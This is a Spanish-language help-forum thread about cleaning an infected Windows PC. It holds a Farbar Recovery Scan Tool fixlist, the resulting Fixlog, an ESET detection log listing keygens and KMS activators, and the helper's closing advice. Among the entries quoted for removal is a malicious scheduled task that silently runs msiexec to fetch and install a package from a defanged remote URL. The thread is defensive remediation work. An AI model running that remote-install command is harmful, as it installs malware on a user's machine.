Task: {5074E7C9-8B67-498E-B5FA-3D6C2BCC441E} - System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6} => "msiexec.exe" -i hxxp://inthemel.info/zbbqikhhxcuh.ciy -q
Task: {54C284F1-9B86-429C-9B70-433F38B5D831} - \SUPERAntiSpyware Scheduled Task dbbefc56-5364-4bfa-9168-4c0476674cbc -> No File <==== ATTENTION
Task: {A87F6214-B479-4A28-BD0C-028D27A1F05C} - System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73} => "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" hxxp://jooring.net/cl/?guid=y59kcxeaks8jrwj72y9g2sxsddnfs11g&prid=1&pid=4_1324_0
Task: {F4E00397-2025-4A47-B1A6-8FE93D4F1AED} - \SUPERAntiSpyware Scheduled Task 6a4df63f-045a-4646-b0f7-05167fe1a6a5 -> No File <==== ATTENTION
Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
AlternateDataStreams: C:\Windows:nlsPreferences [386]


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
END

Lo guardas bajo el nombre de fixlist.txt en el escritorio <<< Esto es muy importante.<<

Nota: Es importante que la Hta Frst.exe y fixlist.txt se encuentren en la misma ubicación (escritorio) o si no no trabajara.

  • Y ahora usa esta Faq de Windows ¿Cómo iniciar Windows en Modo Seguro?, para trabajar desde ese modo de windows.

  • Ejecutas Frst.exe.

  • Presionas el botón Fix y aguardas a que termine.

  • La Herramienta guardara el reporte en tu escritorio (Fixlog.txt).

Lo pegas en tu próxima respuesta, ademas de este otro analisis con ose indica y me pegas tambien el log, comentado como va el problema:


#16

Fixlog:

Fix result of Farbar Recovery Scan Tool (x64) Version: 10.10.2018
Ran by Dango (19-10-2018 13:33:53) Run:1
Running from C:\Users\Dango\Desktop
Loaded Profiles: Dango (Available Profiles: Dango)
Boot Mode: Safe Mode (minimal)
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:

IFEO\ccd-uninst.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecdtray.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\databasecompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtagent.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtlauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\excel.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\fahconsole.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\helplauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\nitropdf.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\powerpnt.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\regclonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\spreadsheetcompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winword.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winzip64.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzbgtools.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzpreloader.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzupdatenotifier.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
U3 ai14l3mj; C:\Windows\System32\Drivers\ai14l3mj.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U0 aswVmm; no ImagePath
S2 npf; \??\C:\Windows\system32\drivers\npf.sys [X]
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2018-10-04 11:44 - 2018-10-08 10:48 - 000003726 _____ C:\Windows\System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73}
2018-10-04 11:44 - 2018-10-05 09:13 - 000003436 _____ C:\Windows\System32\Tasks\{DA905C87-7E94-C064-9156-0FA60FF7E39B}
2018-10-04 11:44 - 2018-10-04 11:44 - 000003562 _____ C:\Windows\System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}
Task: {5074E7C9-8B67-498E-B5FA-3D6C2BCC441E} - System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6} => "msiexec.exe" -i hxxp://inthemel.info/zbbqikhhxcuh.ciy -q
Task: {54C284F1-9B86-429C-9B70-433F38B5D831} - \SUPERAntiSpyware Scheduled Task dbbefc56-5364-4bfa-9168-4c0476674cbc -> No File <==== ATTENTION
Task: {A87F6214-B479-4A28-BD0C-028D27A1F05C} - System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73} => "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" hxxp://jooring.net/cl/?guid=y59kcxeaks8jrwj72y9g2sxsddnfs11g&prid=1&pid=4_1324_0
Task: {F4E00397-2025-4A47-B1A6-8FE93D4F1AED} - \SUPERAntiSpyware Scheduled Task 6a4df63f-045a-4646-b0f7-05167fe1a6a5 -> No File <==== ATTENTION
Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
Shortcut: C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
AlternateDataStreams: C:\Windows:nlsPreferences [386]


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
END
*****************

Error: Restore point can only be created in normal mode.
Processes closed successfully.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ccd-uninst.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\clonecd.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\clonecdtray.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\databasecompare.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dtagent.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dtlauncher.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\excel.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\fahconsole.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\helplauncher.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nitropdf.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\powerpnt.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\regclonecd.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spreadsheetcompare.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\winword.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\winzip64.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wzbgtools.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wzpreloader.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wzupdatenotifier.exe => removed successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\Software\Classes\PROTOCOLS\Handler\WSWSVCUchrome => removed successfully
ai14l3mj => service not found.
HKLM\System\CurrentControlSet\Services\aswVmm => removed successfully
aswVmm => service removed successfully
HKLM\System\CurrentControlSet\Services\npf => removed successfully
npf => service removed successfully
HKLM\System\CurrentControlSet\Services\taphss6 => removed successfully
taphss6 => service removed successfully
HKLM\System\CurrentControlSet\Services\VGPU => removed successfully
VGPU => service removed successfully
"C:\Windows\System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73}" => not found
"C:\Windows\System32\Tasks\{DA905C87-7E94-C064-9156-0FA60FF7E39B}" => not found
"C:\Windows\System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5074E7C9-8B67-498E-B5FA-3D6C2BCC441E}" => not found
"C:\Windows\System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{54C284F1-9B86-429C-9B70-433F38B5D831}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{54C284F1-9B86-429C-9B70-433F38B5D831}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SUPERAntiSpyware Scheduled Task dbbefc56-5364-4bfa-9168-4c0476674cbc" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A87F6214-B479-4A28-BD0C-028D27A1F05C}" => not found
"C:\Windows\System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{AD1685E2-7536-7AF3-A95D-3F7867585C73}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F4E00397-2025-4A47-B1A6-8FE93D4F1AED}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F4E00397-2025-4A47-B1A6-8FE93D4F1AED}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SUPERAntiSpyware Scheduled Task 6a4df63f-045a-4646-b0f7-05167fe1a6a5" => removed successfully
C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk => moved successfully
C:\Users\Dango\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk => moved successfully
C:\Windows => ":nlsPreferences" ADS removed successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully
"HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully
"HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully


========= End of RemoveProxy: =========


========= netsh winsock reset =========


El cat logo Winsock se restableci¢ correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= End of CMD: =========


========= ipconfig /renew =========


Configuraci¢n IP de Windows


========= End of CMD: =========


========= ipconfig /flushdns =========


Configuraci¢n IP de Windows

No se puede vaciar la cach‚ de resoluci¢n de DNS: Error de una funci¢n durante la ejecuci¢n.


========= End of CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to connect to BITS - 0x8007042c
No se puede iniciar el servicio o grupo de dependencia.



========= End of CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 4159390 B
Java, Flash, Steam htmlcache => 178343613 B
Windows/system/drivers => 8424110 B
Edge => 0 B
Chrome => 0 B
Firefox => 100194400 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 88010 B
Public => 0 B
ProgramData => 0 B
systemprofile => 58558406 B
systemprofile32 => 117073 B
LocalService => 66228 B
NetworkService => 66228 B
Dango => 8276936 B
DefaultAppPool => 88010 B

RecycleBin => 0 B
EmptyTemp: => 341.8 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 13:34:14 ====

#17

Log Eset:

|C:\AdwCleaner\Quarantine\v1\20181004.220428\3\RPEng\F82BFB4843174DA29E8A920DC0B702A4\WcInstaller.exe#2BA4444535BF50BB|una variante de MSIL/WebCompanion.C aplicación potencialmente no deseada|desinfectado por eliminación|
|---|---|---|
|C:\Program Files (x86)\Cheat Engine 6.3\cheatengine-i386.exe|una variante de Win32/HackTool.CheatEngine.AB aplicación potencialmente no segura|desinfectado por eliminación|
|C:\Program Files (x86)\PDFCreator\Toolbar\pdfforge Toolbar_setup.exe|Win32/Toolbar.Widgi aplicación potencialmente no deseada|desinfectado por eliminación|
|C:\Users\Dango\Desktop\01 Rutine Malwarebytes\ccsetup543.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|C:\Users\Dango\Desktop\Nueva carpeta\ccsetup547.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|C:\Windows\AutoKMS\AutoKMS.exe|una variante de MSIL/HackKMS.H aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Descargas\Compressed\AgfEII-TRR-RLD-PGME\Age.of.Empires.II.HD.The.Rise.of.the.Rajas-RELOADED\rld-aoe2hdrajas-compucalitv.iso|una variante de Win32/HackTool.Crack.EN aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Descargas\Compressed\VOOBLY\aoe2+fe\Age of Empires II\AoE2Wide\Process.exe|Win32/PrcView aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Descargas\Programs\FVC4.1.9.4\Freemake Video Converter 4.1.9.4\Freemake Video Converter 4.1.9.4.exe|una variante de Win32/Freemake.A aplicación potencialmente no deseada,una variante de Win32/OpenCandy.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Descargas\Programs\Recuva.1.52.1086.Pro.LHG\Recuva.1.52.1086.Professional\rcsetup152.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Android\Games Android\Deemo\D33M0 Full v2.0.0 [Apkingdom.com].apk|una variante de Android/Secapk.E aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Android\Games Android\Zenonia 5 +Internet\zenonia-5-1-1-8-es-en-fr-de-it-android.apk|una variante de Android/Nqshield.A aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Antivirus\Kaspersky\Keys Kaspersky\KAV - KIS KEYS August  16, 2014.rar|Win32/HackTool.Kiser.ZV troyano|eliminado|
|E:\Data\Documentos\Programas\Autodesk\Autodesk Inventor Pro 2015 x64\Autodesk Inventor Pro 2015 x64.iso|una variante de Win32/Keygen.HA aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\CCleaner\CCleaner 5\ccsetup_514.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\CCleaner\CCleaner Professional v5.14.5493 Final\CCleaner Professional v5.14.5493 Final.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\CD Booteable\UltraISO + Boot WinXP by NytroXFoX.rar|una variante de Win32/HackTool.Patcher.CL aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Converter\FreeMake Video Converter\FreemakeVideoConverterSetup.exe|una variante de Win32/Freemake.A aplicación potencialmente no deseada,una variante de Win32/OpenCandy.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Desfragmentadores\Defraggler\Defraggler 2.20\dfsetup220.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\DirectX\32bit_Advanced_v456.exe|Win32/WebDevAZ.C aplicación potencialmente no deseada|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Diseño y Animacion\Corel Painter\Corel Painter 12\Descargapremium69.com_C.P.12_Ke_bY_potozilandia_Anuncialo.info.rar|una variante de Win32/Keygen.AU aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Drivers\DLL Faltantes\Dll File Fixer\disable_activation.cmd|BAT/HostsChanger.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Drivers\Driver Genius Professional\Driver Genius Professional 12\crack drivers\DriverGenius.exe|Win32/DriverGenius.A aplicación potencialmente no deseada|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Edicion Video\Freemake Video Converter\FreemakeVideoConverter_4.1.4.6.exe|una variante de Win32/Freemake.A aplicación potencialmente no deseada,una variante de Win32/OpenCandy.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Edicion Video\Sony Vegas\SNYMVEENE013\Sony.Vegas.PRO.v12.0.0.486.Multilenguaje.Incl.Keygen.and.Patch-DI\Sony.Products.Multikeygen.v2.2.Keygen.Only.READ.NFO-DI\Keygen.exe|una variante de Win32/Keygen.HU aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Internet Download Manager\IDM.6.25.b.12.kuyhAa\disable_activation.cmd|BAT/HostsChanger.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Keylogger\Keylogger Dowloader\SoftonicDownloader_para_revealer-keylogger.exe|Win32/SoftonicDownloader.A aplicación potencialmente no deseada|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Microsoft Office\Microsoft Office 2010\remokis.iso|Win32/Hidcon.B aplicación potencialmente no segura,Win32/HackKMS.A aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Microsoft Office\Microsoft Office 2013\Microsoft Toolkit 2.4.9 Activar Office 2013\MTK.v2.4.9.rar|una variante de MSIL/HackKMS.G aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Microsoft Project Pro 2010 Espanol\Activador  office 2010\Office 2010 Toolkit.exe|una variante de MSIL/HackKMS.A aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Nero\Nero 8\Nero Startsmart\Nero.v8.2.8.0_ES.Trial+Keys_leian1306.part1.rar|una variante de Win32/Keygen.DS aplicación potencialmente no segura|eliminado|
|E:\Data\Documentos\Programas\Recuva\rcsetup152.exe|Win32/Bundled.Toolbar.Google.D aplicación potencialmente no segura|desinfectado por eliminación|
|E:\Data\Documentos\Programas\Sistemas Operativos\Hiren ISO BOOT\Hiren's.BootCD.10.2.rar|una variante de Win32/RemoteAdmin.RemoteExec.AA aplicación potencialmente no segura,está correcto|eliminado|
|E:\Data\Documentos\Programas\Unlocker\Unlocker Downloader\SoftonicDownloader_para_unlocker.exe|Win32/SoftonicDownloader.A aplicación potencialmente no deseada|desinfectado por eliminación|
|F:\rise rajas\Age of Empires II HD\STEAM_APIRAJAS.DLL|una variante de Win32/HackTool.Crack.EN aplicación potencialmente no segura|desinfectado por eliminación|
|G:\UsbFix\Quarantine\H\KGB (4GB).lnk.vir|LNK/Agent.DA troyano|desinfectado por eliminación|
|G:\Windows\AutoKMS\AutoKMS.exe|una variante de MSIL/HackKMS.H aplicación potencialmente no segura|desinfectado por eliminación|

Tal parece que la página no ha vuelto a salir, igual debo confirmar si es que aún se apaga de repente.


#18

Ok…comentas como va todo


#19

Después de un rato la página no ha vuelto a salir y no se ha apagado de improvisto, podría decirse que ya se solucionó eso.

¿Que virus tenía? ¿Se puede saber en especifico con que archivo se contagióa el PC?

Muchas gracias por la ayuda.


#20

En un pc con esa cantidad de Keygens, mas algún Adware, lo normal es que se produzcan esos errores.

Tu piensa que esos Keygens, primeramente para instalarlos hay que desactivar el antivirus, por lo que pueden meter cualquier cosa durante su uso y por otra, no dejan de ser programas, que como supondrás no estan diseñados para un funcionamiento correcto en un pc, pues no están testados como otro tipo de programas, por lo que su instalación puede derivar en errores e incluso en formatos.

Ademas tampoco tienes un antivirus un poc mas adecuado, pues el de Microsoft no tiene una protección tan creciente como Kaspersky free, Avast, etc, algo que deberias pensar en poner, amen de como digo, no usar esa cantidad de Keygens, o seguirás con problemas.

Para eliminar las herramientas usadas en la desinfección, realizas:

  • Descargas y Ejecutas >> Delfix, en tu escritorio.

  • Doble clic para ejecutarlo.(Si usas Windows Vista/7 /8 /10,presiona clic derecho y selecciona >>;Ejecutar como Administrador.)

  • Marca solamente la casilla Remove disinfection tools

  • Pulsar en Run.

Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.

Si queda alguna herramienta, la desinstalas desde panel de Windows y aquellas que no estén listadas, se eliminan directamente.


Me alegro de haberte podido ayudar! :+1:


TEMA SOLUCIONADO


#21

Este tema se cerró automáticamente 2 días después del último post. No se permiten nuevas respuestas.